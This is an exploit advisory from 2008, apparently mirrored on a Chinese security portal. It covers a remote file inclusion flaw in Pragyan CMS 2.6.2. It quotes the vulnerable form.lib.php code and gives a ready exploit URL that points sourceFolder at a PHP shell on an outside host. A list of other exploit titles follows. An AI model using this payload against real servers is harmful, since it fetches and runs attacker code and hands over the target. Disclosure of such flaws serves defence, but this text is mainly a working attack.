Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

所属分类: 网络安全 / Exploit 阅读数: 120
收藏 0 赞 0 分享
<< In The Name Of GOD >>


-------------------------------------------------------------
- [ Persian Boys Hacking Team ] -:- 2008
-
- discovered by N3TR00T3R [at] Y! [dot] com
- pragyan 2.6.2 Remote File Includion
- download :http://sourceforge.net/project/showfiles.php?group_id=220286
- sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd
r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser
Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
[www.Persian-Boys.com] & [www.irchatan.com]
--------------------------------------------------------------

if register_globals = On;


Vul Code : [/cms/modules/form.lib.php]
##########################################################
#global $sourceFolder;
#global $moduleFolder;
#require_once("$sourceFolder/$moduleFolder/form/editform.php");
#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");
#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");
##########################################################

Exploit :

##########################################################
#
# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?
#
##########################################################
更多精彩内容其他人还在看

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

<< In The Name Of GOD >> -------------------------------------------------------------
收藏 0 赞 0 分享

Galatolo Web Manager 1.3a

--== ============================================================================ ==-- --== Galatolo Web Manager 1.3a <= XSS / Remo
收藏 0 赞 0 分享

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

==================================================== | pSys v0.7.0 Alpha Multiple Remote File Include | (works only with
收藏 0 赞 0 分享

Bilboblog 2.1 Multiple Remote Vulnerabilities

------------------------------------------------------------------ Name : Bilboblog 2.1 Multiples Vulnerabilities Descrip
收藏 0 赞 0 分享

Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

########################## www.BugReport.ir ######################### # # AmnPardaz Security Research Team # # Title: Pluck
收藏 0 赞 0 分享

Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

<?php /* Coded By RMx - Liz0zim BiyoSecurity.Com & Coderx.org Ki zava Ki Zava :) Thanx : Crackers_Child - TR_IP - Volq
收藏 0 赞 0 分享

CodeDB (list.php lang) Local File Inclusion Vulnerability

############################################################################### # # Name : CodeDB (list.php lang) Local File In
收藏 0 赞 0 分享

MFORUM 0.1a Arbitrary Add-Admin Vulnerability

================================================= MFORUM 0.1a Arbitrary Add-Admin Vulnerability ====================================
收藏 0 赞 0 分享

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

######## ## ## ###### ######## ## ## ######## ######## ####### ######## ## ### ## ## ## ## ## ## ## ##
收藏 0 赞 0 分享

MS Windows (.doc File) Malformed Pointers Denial of Service Exploit

/***************************************************************************** * Microsoft Windows .doc File Malformed Pointer
收藏 0 赞 0 分享
查看更多